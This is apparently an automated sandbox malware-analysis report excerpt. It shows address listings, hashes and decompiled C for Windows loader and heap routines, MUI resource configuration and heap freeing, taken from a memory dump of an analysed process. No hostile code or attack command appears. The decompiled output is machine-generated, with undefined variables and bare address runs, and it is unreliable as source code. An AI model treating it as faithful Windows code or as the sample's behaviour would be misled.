                                                                                                                              0x00000000
                                                                                                                              0x1d7a37ea
                                                                                                                              0x1d74ba6f
                                                                                                                              0x1d74ba7b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74ba87
                                                                                                                              0x1d74ba97
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bab5
                                                                                                                              0x1d74baba
                                                                                                                              0x1d74bac2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74bac8
                                                                                                                              0x1d74bacf
                                                                                                                              0x1d7a387a
                                                                                                                              0x1d7a3880
                                                                                                                              0x1d7a3886
                                                                                                                              0x1d7a388b
                                                                                                                              0x1d7a388b
                                                                                                                              0x1d7a3880
                                                                                                                              0x1d74bad5
                                                                                                                              0x1d74bad9
                                                                                                                              0x00000000
                                                                                                                              0x1d74bc4f
                                                                                                                              0x1d74bc4f
                                                                                                                              0x1d74bc54
                                                                                                                              0x00000000
                                                                                                                              0x1d74bc54
                                                                                                                              0x1d74ba40

                                                                                                                              Strings
                                                                                                                              • LdrpLoadResourceFromAlternativeModule, xrefs: 1D7A38B6
                                                                                                                              • 'LDR: %s(), invalid image format of MUI file , xrefs: 1D7A38BB
                                                                                                                              • {, xrefs: 1D7A38C4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                                                                              • API String ID: 0-1697150599
                                                                                                                              • Opcode ID: 3197023a4143458a72ea787f073364f957d92f238a45a3bea6be3288cf8a3d35
                                                                                                                              • Instruction ID: 5f6b7bee4941a3c6425d73cc58dd30086949568a0911f83022cd2815050f3f08
                                                                                                                              • Opcode Fuzzy Hash: 3197023a4143458a72ea787f073364f957d92f238a45a3bea6be3288cf8a3d35
                                                                                                                              • Instruction Fuzzy Hash: 35E156306083869BD716CF14C580B7BB7E5BF88B64F61896EE8898B260DB74DD45CB43
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D74B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E1D74B5E0(void* __ebx, void* __edi, signed int __esi, void* __eflags) {
				short _t100;
				short _t101;
				signed int* _t107;
				signed char* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed char* _t114;
				signed int _t115;
				signed int _t117;
				signed int _t125;
				void* _t129;
				void* _t131;
				void* _t133;
				void* _t135;
				void* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t150;
				short _t158;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				signed int _t201;
				signed int _t202;
				signed int _t205;
				signed int _t208;
				void* _t209;

				_push(0x48);
				_push(0x1d81bfb0);
				E1D797C40(__ebx, __edi, __esi);
				_t185 =  *(_t209 + 8);
				 *(_t209 - 0x34) = _t185;
				 *(_t209 - 0x40) =  *(_t209 + 0x10);
				 *((intOrPtr*)(_t209 - 0x28)) = L"MUI";
				 *((intOrPtr*)(_t209 - 0x24)) = 1;
				 *((intOrPtr*)(_t209 - 0x20)) = 0;
				 *(_t209 - 0x38) =  *(_t209 + 0xc);
				 *(_t209 - 0x30) = 0;
				_t158 = 0x2e;
				 *((short*)(_t209 - 0x50)) = _t158;
				_t100 = 0x30;
				 *((short*)(_t209 - 0x4e)) = _t100;
				 *(_t209 - 0x4c) = L"LdrResGetRCConfig Enter";
				_t101 = 0x2c;
				 *((short*)(_t209 - 0x58)) = _t101;
				 *((short*)(_t209 - 0x56)) = _t158;
				 *(_t209 - 0x54) = L"LdrResGetRCConfig Exit";
				 *(_t209 - 0x3c) =  *(_t209 + 0x14) & 0x00002000;
				asm("sbb esi, esi");
				_t205 = (__esi & 0x00001000) + 0x1000;
				_t107 =  *( *[fs:0x30] + 0x50);
				if(_t107 != 0) {
					__eflags =  *_t107;
					if( *_t107 == 0) {
						goto L1;
					}
					_t108 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					if(( *_t108 & 0x00000001) != 0) {
						_t109 = E1D753C40();
						_t198 = 0x7ffe0384;
						__eflags = _t109;
						if(_t109 == 0) {
							_t110 = 0x7ffe0384;
						} else {
							_t110 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E1D7CFC01(_t209 - 0x50,  *_t110 & 0x000000ff);
						_t185 =  *(_t209 - 0x34);
					} else {
						_t198 = 0x7ffe0384;
					}
					if(_t185 == 0) {
						 *(_t209 - 0x2c) = 0xc000000d;
						goto L8;
					} else {
						if( *((intOrPtr*)(_t209 + 0x18)) == 0) {
							L17:
							__eflags =  *(_t209 + 0xc);
							if( *(_t209 + 0xc) == 0) {
								__eflags =  *(_t209 - 0x3c);
								if(__eflags != 0) {
									goto L18;
								}
								_push(0);
								_push( *(_t209 + 0x14));
								_push(_t209 - 0x38);
								_push(_t185);
								_t117 = E1D74AB70(0, _t198, _t205, __eflags);
								__eflags = _t117;
								if(_t117 >= 0) {
									goto L18;
								}
								L12:
								 *[fs:0x0] =  *((intOrPtr*)(_t209 - 0x10));
								return _t117;
							}
							L18:
							_t201 = E1D74AD00( *(_t209 - 0x34),  *(_t209 - 0x38), _t205 | 0x00200030, _t209 - 0x28, 3, _t209 - 0x30, _t209 - 0x44, 0, 0);
							 *(_t209 - 0x2c) = _t201;
							__eflags = _t201;
							if(_t201 >= 0) {
								 *((intOrPtr*)(_t209 - 4)) = 0;
								_t208 =  *(_t209 - 0x30);
								__eflags =  *(_t209 - 0x3c);
								if( *(_t209 - 0x3c) != 0) {
									L56:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									_t125 =  *(_t209 - 0x40);
									__eflags = _t125;
									if(_t125 != 0) {
										 *_t125 = _t208;
									}
									_t202 = 0;
									 *(_t209 - 0x2c) = 0;
									L23:
									__eflags =  *((char*)(_t209 + 0x18));
									if( *((char*)(_t209 + 0x18)) != 0) {
										__eflags = _t208;
										if(_t208 == 0) {
											_t208 = _t208 | 0xffffffff;
											__eflags = _t208;
										}
										_push(0);
										_push(_t202);
										_push(2);
										_push(0);
										_push(_t208);
										_push(0);
										__eflags = 0;
										E1D7493A6(0,  *(_t209 - 0x34), 0, _t202, _t208, 0);
									}
									_t198 = 0x7ffe0384;
									L8:
									_t113 =  *( *[fs:0x30] + 0x50);
									if(_t113 != 0) {
										__eflags =  *_t113;
										if( *_t113 == 0) {
											goto L9;
										}
										_t114 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										L10:
										if(( *_t114 & 0x00000001) != 0) {
											_t115 = E1D753C40();
											__eflags = _t115;
											if(_t115 != 0) {
												_t198 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
												__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											}
											E1D7CFC01(_t209 - 0x58,  *_t198 & 0x000000ff);
										}
										_t117 =  *(_t209 - 0x2c);
										goto L12;
									}
									L9:
									_t114 = 0x7ffe0385;
									goto L10;
								}
								_t190 =  *((intOrPtr*)(_t208 + 4));
								__eflags = _t190 + _t208 - ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38);
								if(_t190 + _t208 > ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38)) {
									_t202 = 0xc000007b;
									 *(_t209 - 0x2c) = 0xc000007b;
									L70:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									L21:
									__eflags = _t202;
									if(_t202 >= 0) {
										_t208 =  *(_t209 - 0x30);
									} else {
										_t208 = 0;
										 *(_t209 - 0x30) = 0;
									}
									goto L23;
								}
								_t202 = 0xc00b0003;
								 *(_t209 - 0x2c) = 0xc00b0003;
								_t168 =  *((intOrPtr*)(_t208 + 0x44));
								_t129 =  *((intOrPtr*)(_t208 + 0x48)) + _t168;
								__eflags = _t129 - _t190;
								if(_t129 > _t190) {
									goto L70;
								}
								__eflags = _t129 - _t168;
								if(_t129 < _t168) {
									goto L70;
								}
								_t169 =  *((intOrPtr*)(_t208 + 0x4c));
								_t131 =  *((intOrPtr*)(_t208 + 0x50)) + _t169;
								__eflags = _t131 - _t190;
								if(_t131 > _t190) {
									goto L70;
								}
								__eflags = _t131 - _t169;
								if(_t131 < _t169) {
									goto L70;
								}
								_t170 =  *((intOrPtr*)(_t208 + 0x54));
								_t133 =  *((intOrPtr*)(_t208 + 0x58)) + _t170;
								__eflags = _t133 - _t190;
								if(_t133 > _t190) {
									goto L70;
								}
								__eflags = _t133 - _t170;
								if(_t133 < _t170) {
									goto L70;
								}
								_t171 =  *((intOrPtr*)(_t208 + 0x5c));
								_t135 =  *((intOrPtr*)(_t208 + 0x60)) + _t171;
								__eflags = _t135 - _t190;
								if(_t135 > _t190) {
									goto L70;
								}
								__eflags = _t135 - _t171;
								if(_t135 < _t171) {
									goto L70;
								}
								_t172 =  *((intOrPtr*)(_t208 + 0x64));
								_t137 =  *((intOrPtr*)(_t208 + 0x68)) + _t172;
								__eflags = _t137 - _t190;
								if(_t137 > _t190) {
									goto L70;
								}
								__eflags = _t137 - _t172;
								if(_t137 < _t172) {
									goto L70;
								}
								_t173 =  *((intOrPtr*)(_t208 + 0x6c));
								_t139 =  *((intOrPtr*)(_t208 + 0x70)) + _t173;
								__eflags = _t139 - _t190;
								if(_t139 > _t190) {
									goto L70;
								}
								__eflags = _t139 - _t173;
								if(_t139 < _t173) {
									goto L70;
								}
								_t174 =  *((intOrPtr*)(_t208 + 0x74));
								_t141 =  *((intOrPtr*)(_t208 + 0x78)) + _t174;
								__eflags = _t141 - _t190;
								if(_t141 > _t190) {
									goto L70;
								}
								__eflags = _t141 - _t174;
								if(_t141 < _t174) {
									goto L70;
								}
								_t175 =  *((intOrPtr*)(_t208 + 0x7c));
								_t143 =  *((intOrPtr*)(_t208 + 0x80)) + _t175;
								__eflags = _t143 - _t190;
								if(_t143 > _t190) {
									goto L70;
								}
								__eflags = _t143 - _t175;
								if(_t143 < _t175) {
									goto L70;
								}
								__eflags =  *_t208 - 0xfecdfecd;
								if( *_t208 != 0xfecdfecd) {
									goto L70;
								}
								__eflags = _t190 -  *((intOrPtr*)(_t209 - 0x44));
								if(_t190 !=  *((intOrPtr*)(_t209 - 0x44))) {
									goto L70;
								}
								__eflags =  *((intOrPtr*)(_t208 + 8)) - 0x10000;
								if( *((intOrPtr*)(_t208 + 8)) != 0x10000) {
									goto L70;
								}
								_t176 =  *(_t208 + 0xc);
								__eflags =  *(_t208 + 0xc);
								if( *(_t208 + 0xc) != 0) {
									_t191 = 7;
									_t144 = E1D77B95A(_t176, _t191);
									__eflags = _t144;
									if(_t144 == 0) {
										goto L70;
									}
								}
								_t192 = 3;
								_t145 = E1D77B95A( *(_t208 + 0x10) & 0xffffffcf, _t192);
								__eflags = _t145;
								if(_t145 == 0) {
									goto L70;
								}
								_t193 = 0x30;
								_t146 = E1D77B95A( *(_t208 + 0x10) & 0xfffffffc, _t193);
								__eflags = _t146;
								if(_t146 == 0) {
									goto L70;
								}
								__eflags =  *(_t208 + 0x10) & 0x00000001;
								if(( *(_t208 + 0x10) & 0x00000001) == 0) {
									L55:
									 *(_t209 - 0x2c) = 0;
									goto L56;
								}
								_t194 = 3;
								_t147 = E1D77B95A( *((intOrPtr*)(_t208 + 0x18)), _t194);
								__eflags = _t147;
								if(_t147 == 0) {
									goto L70;
								}
								_t182 =  *(_t208 + 0x14);
								__eflags =  *(_t208 + 0x14);
								if( *(_t208 + 0x14) != 0) {
									_t148 = E1D77B95A(_t182, 0x100);
									__eflags = _t148;
									if(_t148 == 0) {
										goto L70;
									}
								}
								goto L55;
							}
							__eflags = _t201 - 0xc000007b;
							if(_t201 != 0xc000007b) {
								_t202 = 0xc000008a;
								 *(_t209 - 0x2c) = 0xc000008a;
							}
							goto L21;
						}
						_t150 = E1D74D530( *(_t209 - 0x34), 0, 0, 8);
						 *(_t209 - 0x30) = _t150;
						if(_t150 != 0xffffffff) {
							__eflags = _t150;
							if(_t150 == 0) {
								_t185 =  *(_t209 - 0x34);
								goto L17;
							} else {
								 *(_t209 - 0x2c) = 0;
								_t184 =  *(_t209 - 0x40);
								__eflags = _t184;
								if(_t184 != 0) {
									 *_t184 = _t150;
								}
								goto L8;
							}
						} else {
							 *(_t209 - 0x2c) = 0xc000008a;
							goto L8;
						}
					}
				}
				L1:
				_t108 = 0x7ffe0385;
				goto L2;
			}

















































                                                                                                                              0x1d74b5e0
                                                                                                                              0x1d74b5e2
                                                                                                                              0x1d74b5e7
                                                                                                                              0x1d74b5ec
                                                                                                                              0x1d74b5ef
                                                                                                                              0x1d74b5f5
                                                                                                                              0x1d74b5f8
                                                                                                                              0x1d74b5ff
                                                                                                                              0x1d74b608
                                                                                                                              0x1d74b60e
                                                                                                                              0x1d74b611
                                                                                                                              0x1d74b616
                                                                                                                              0x1d74b617
                                                                                                                              0x1d74b61d
                                                                                                                              0x1d74b61e
                                                                                                                              0x1d74b622
                                                                                                                              0x1d74b62b
                                                                                                                              0x1d74b62c
                                                                                                                              0x1d74b630
                                                                                                                              0x1d74b634
                                                                                                                              0x1d74b643
                                                                                                                              0x1d74b648
                                                                                                                              0x1d74b651
                                                                                                                              0x1d74b659
                                                                                                                              0x1d74b65e
                                                                                                                              0x1d7a363b
                                                                                                                              0x1d7a363d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a364c
                                                                                                                              0x1d74b669
                                                                                                                              0x1d74b66c
                                                                                                                              0x1d7a3656
                                                                                                                              0x1d7a365b
                                                                                                                              0x1d7a3660
                                                                                                                              0x1d7a3662
                                                                                                                              0x1d7a3674
                                                                                                                              0x1d7a3664
                                                                                                                              0x1d7a366d
                                                                                                                              0x1d7a366d
                                                                                                                              0x1d7a367c
                                                                                                                              0x1d7a3681
                                                                                                                              0x1d74b672
                                                                                                                              0x1d74b672
                                                                                                                              0x1d74b672
                                                                                                                              0x1d74b679
                                                                                                                              0x1d7a3689
                                                                                                                              0x00000000
                                                                                                                              0x1d74b67f
                                                                                                                              0x1d74b682
                                                                                                                              0x1d74b6e9
                                                                                                                              0x1d74b6e9
                                                                                                                              0x1d74b6ec
                                                                                                                              0x1d74b8ee
                                                                                                                              0x1d74b8f1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b8f7
                                                                                                                              0x1d74b8f8
                                                                                                                              0x1d74b8fe
                                                                                                                              0x1d74b8ff
                                                                                                                              0x1d74b900
                                                                                                                              0x1d74b905
                                                                                                                              0x1d74b907
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b6c2
                                                                                                                              0x1d74b6c5
                                                                                                                              0x1d74b6d1
                                                                                                                              0x1d74b6d1
                                                                                                                              0x1d74b6f2
                                                                                                                              0x1d74b714
                                                                                                                              0x1d74b716
                                                                                                                              0x1d74b719
                                                                                                                              0x1d74b71b
                                                                                                                              0x1d74b762
                                                                                                                              0x1d74b765
                                                                                                                              0x1d74b768
                                                                                                                              0x1d74b76c
                                                                                                                              0x1d74b8d4
                                                                                                                              0x1d74b8d4
                                                                                                                              0x1d74b8db
                                                                                                                              0x1d74b8de
                                                                                                                              0x1d74b8e0
                                                                                                                              0x1d74b8e2
                                                                                                                              0x1d74b8e2
                                                                                                                              0x1d74b8e4
                                                                                                                              0x1d74b8e6
                                                                                                                              0x1d74b73a
                                                                                                                              0x1d74b73a
                                                                                                                              0x1d74b73e
                                                                                                                              0x1d74b740
                                                                                                                              0x1d74b742
                                                                                                                              0x1d74b744
                                                                                                                              0x1d74b744
                                                                                                                              0x1d74b744
                                                                                                                              0x1d74b747
                                                                                                                              0x1d74b748
                                                                                                                              0x1d74b749
                                                                                                                              0x1d74b74b
                                                                                                                              0x1d74b74c
                                                                                                                              0x1d74b74d
                                                                                                                              0x1d74b74e
                                                                                                                              0x1d74b753
                                                                                                                              0x1d74b753
                                                                                                                              0x1d74b758
                                                                                                                              0x1d74b6a0
                                                                                                                              0x1d74b6a6
                                                                                                                              0x1d74b6ab
                                                                                                                              0x1d7a36f3
                                                                                                                              0x1d7a36f6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3705
                                                                                                                              0x1d74b6b6
                                                                                                                              0x1d74b6b9
                                                                                                                              0x1d7a370f
                                                                                                                              0x1d7a3714
                                                                                                                              0x1d7a3716
                                                                                                                              0x1d7a3721
                                                                                                                              0x1d7a3721
                                                                                                                              0x1d7a3721
                                                                                                                              0x1d7a372d
                                                                                                                              0x1d7a372d
                                                                                                                              0x1d74b6bf
                                                                                                                              0x00000000
                                                                                                                              0x1d74b6bf
                                                                                                                              0x1d74b6b1
                                                                                                                              0x1d74b6b1
                                                                                                                              0x00000000
                                                                                                                              0x1d74b6b1
                                                                                                                              0x1d74b772
                                                                                                                              0x1d74b781
                                                                                                                              0x1d74b783
                                                                                                                              0x1d7a3695
                                                                                                                              0x1d7a369a
                                                                                                                              0x1d7a36ad
                                                                                                                              0x1d7a36ad
                                                                                                                              0x1d74b72d
                                                                                                                              0x1d74b72d
                                                                                                                              0x1d74b72f
                                                                                                                              0x1d7a36eb
                                                                                                                              0x1d74b735
                                                                                                                              0x1d74b735
                                                                                                                              0x1d74b737
                                                                                                                              0x1d74b737
                                                                                                                              0x00000000
                                                                                                                              0x1d74b72f
                                                                                                                              0x1d74b789
                                                                                                                              0x1d74b78e
                                                                                                                              0x1d74b791
                                                                                                                              0x1d74b797
                                                                                                                              0x1d74b799
                                                                                                                              0x1d74b79b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b7a1
                                                                                                                              0x1d74b7a3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b7a9
                                                                                                                              0x1d74b7af
                                                                                                                              0x1d74b7b1
                                                                                                                              0x1d74b7b3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b7b9
                                                                                                                              0x1d74b7bb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b7c1
                                                                                                                              0x1d74b7c7
                                                                                                                              0x1d74b7c9
                                                                                                                              0x1d74b7cb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b7d1
                                                                                                                              0x1d74b7d3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b7d9
                                                                                                                              0x1d74b7df
                                                                                                                              0x1d74b7e1
                                                                                                                              0x1d74b7e3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b7e9
                                                                                                                              0x1d74b7eb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b7f1
                                                                                                                              0x1d74b7f7
                                                                                                                              0x1d74b7f9
                                                                                                                              0x1d74b7fb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b801
                                                                                                                              0x1d74b803
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b809
                                                                                                                              0x1d74b80f
                                                                                                                              0x1d74b811
                                                                                                                              0x1d74b813
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b819
                                                                                                                              0x1d74b81b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b821
                                                                                                                              0x1d74b827
                                                                                                                              0x1d74b829
                                                                                                                              0x1d74b82b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b831
                                                                                                                              0x1d74b833
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b839
                                                                                                                              0x1d74b842
                                                                                                                              0x1d74b844
                                                                                                                              0x1d74b846
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b84c
                                                                                                                              0x1d74b84e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b854
                                                                                                                              0x1d74b85a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b860
                                                                                                                              0x1d74b863
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b869
                                                                                                                              0x1d74b870
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b876
                                                                                                                              0x1d74b879
                                                                                                                              0x1d74b87b
                                                                                                                              0x1d7a36bb
                                                                                                                              0x1d7a36bc
                                                                                                                              0x1d7a36c1
                                                                                                                              0x1d7a36c3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a36c5
                                                                                                                              0x1d74b889
                                                                                                                              0x1d74b88a
                                                                                                                              0x1d74b88f
                                                                                                                              0x1d74b891
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b89f
                                                                                                                              0x1d74b8a0
                                                                                                                              0x1d74b8a5
                                                                                                                              0x1d74b8a7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b8ad
                                                                                                                              0x1d74b8b1
                                                                                                                              0x1d74b8d1
                                                                                                                              0x1d74b8d1
                                                                                                                              0x00000000
                                                                                                                              0x1d74b8d1
                                                                                                                              0x1d74b8b5
                                                                                                                              0x1d74b8b9
                                                                                                                              0x1d74b8be
                                                                                                                              0x1d74b8c0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74b8c6
                                                                                                                              0x1d74b8c9
                                                                                                                              0x1d74b8cb
                                                                                                                              0x1d7a36cf
                                                                                                                              0x1d7a36d4
                                                                                                                              0x1d7a36d6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a36d8
                                                                                                                              0x00000000
                                                                                                                              0x1d74b8cb
                                                                                                                              0x1d74b71d
                                                                                                                              0x1d74b723
                                                                                                                              0x1d74b725
                                                                                                                              0x1d74b72a
                                                                                                                              0x1d74b72a
                                                                                                                              0x00000000
                                                                                                                              0x1d74b723
                                                                                                                              0x1d74b68c
                                                                                                                              0x1d74b691
                                                                                                                              0x1d74b697
                                                                                                                              0x1d74b6d4
                                                                                                                              0x1d74b6d6
                                                                                                                              0x1d74b6e6
                                                                                                                              0x00000000
                                                                                                                              0x1d74b6d8
                                                                                                                              0x1d74b6d8
                                                                                                                              0x1d74b6db
                                                                                                                              0x1d74b6de
                                                                                                                              0x1d74b6e0
                                                                                                                              0x1d74b6e2
                                                                                                                              0x1d74b6e2
                                                                                                                              0x00000000
                                                                                                                              0x1d74b6e0
                                                                                                                              0x1d74b699
                                                                                                                              0x1d74b699
                                                                                                                              0x00000000
                                                                                                                              0x1d74b699
                                                                                                                              0x1d74b697
                                                                                                                              0x1d74b679
                                                                                                                              0x1d74b664
                                                                                                                              0x1d74b664
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                              • API String ID: 0-1145731471
                                                                                                                              • Opcode ID: 302edba9212798c0ca5c5ea2503bcc76754aa5e0398063361ea3e9eb6884a7b5
                                                                                                                              • Instruction ID: 00340485524a9ac82115711f08e2113b605ead13036bbdf7b7221493678d61b8
                                                                                                                              • Opcode Fuzzy Hash: 302edba9212798c0ca5c5ea2503bcc76754aa5e0398063361ea3e9eb6884a7b5
                                                                                                                              • Instruction Fuzzy Hash: E9B18E35A047558BCB16CFA4D890BADB7B5BF44734F29862AE425DB790D770E840CF12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E1D73F75B(void* __ecx, signed short* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				signed char _t63;
				signed int _t67;
				void* _t71;
				intOrPtr _t72;
				void* _t79;
				signed char* _t82;
				intOrPtr _t83;
				signed char* _t88;
				intOrPtr _t89;
				void* _t90;
				signed char* _t93;
				void* _t126;
				signed int* _t127;

				_t127 = __edx;
				_t126 = __ecx;
				_t58 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t31 =  &(_t127[4]); // 0xddeeddfe
					E1D798140(_t31, _t58 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t63 =  *(_t126 + 0xcc) ^  *0x1d836d48;
				if(_t63 == 0) {
					_t63 = E1D73F858(_t127,  &_v12,  &_v8);
					if(_t63 != 0) {
						_t71 = E1D73FABA( &_v12,  &_v8, 0x4000);
						_t109 = _t71;
						if(_t71 < 0) {
							_t72 =  *[fs:0x30];
							__eflags =  *(_t72 + 0xc);
							if( *(_t72 + 0xc) == 0) {
								_push("HEAP: ");
								E1D73B910();
							} else {
								E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t126);
							_t63 = E1D73B910("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t109);
						} else {
							_t79 = E1D753C40();
							_t110 = 0x7ffe0380;
							if(_t79 != 0) {
								_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t82 = 0x7ffe0380;
							}
							if( *_t82 != 0) {
								_t83 =  *[fs:0x30];
								__eflags =  *(_t83 + 0x240) & 0x00000001;
								if(( *(_t83 + 0x240) & 0x00000001) != 0) {
									E1D7FF13E(_t110, _t126, _v12, _v8, 7);
								}
							}
							 *((intOrPtr*)(_t126 + 0x220)) =  *((intOrPtr*)(_t126 + 0x220)) + 1;
							 *((intOrPtr*)(_t126 + 0x240)) =  *((intOrPtr*)(_t126 + 0x240)) + 1;
							 *((intOrPtr*)(_t126 + 0x244)) =  *((intOrPtr*)(_t126 + 0x244)) + _v8;
							 *((intOrPtr*)(_t126 + 0x230)) =  *((intOrPtr*)(_t126 + 0x230)) + 1;
							if(E1D753C40() != 0) {
								_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t88 = _t110;
							}
							if( *_t88 != 0) {
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0x240) & 0x00000001;
								if(( *(_t89 + 0x240) & 0x00000001) != 0) {
									__eflags = E1D753C40();
									if(__eflags != 0) {
										_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E1D7FF058(_t110, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t110 & 0x000000ff);
								}
							}
							_t90 = E1D753C40();
							_t111 = 0x7ffe038a;
							if(_t90 != 0) {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t93 = 0x7ffe038a;
							}
							if( *_t93 != 0) {
								__eflags = E1D753C40();
								if(__eflags != 0) {
									_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								}
								E1D7FF058(_t111, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t111 & 0x000000ff);
							}
							_t63 = _t127[0] & 0x00000013 | 0x00000008;
							_t127[0] = _t63;
						}
					}
				}
				if( *((intOrPtr*)(_t126 + 0x4c)) != 0) {
					_t127[0] = _t127[0] ^ _t127[0] ^  *_t127;
					_t67 =  *(_t126 + 0x50);
					 *_t127 =  *_t127 ^ _t67;
					return _t67;
				}
				return _t63;
			}



















                                                                                                                              0x1d73f765
                                                                                                                              0x1d73f768
                                                                                                                              0x1d73f76a
                                                                                                                              0x1d73f76d
                                                                                                                              0x1d73f771
                                                                                                                              0x1d73f779
                                                                                                                              0x1d73f77c
                                                                                                                              0x1d79e322
                                                                                                                              0x1d79e326
                                                                                                                              0x1d79e32b
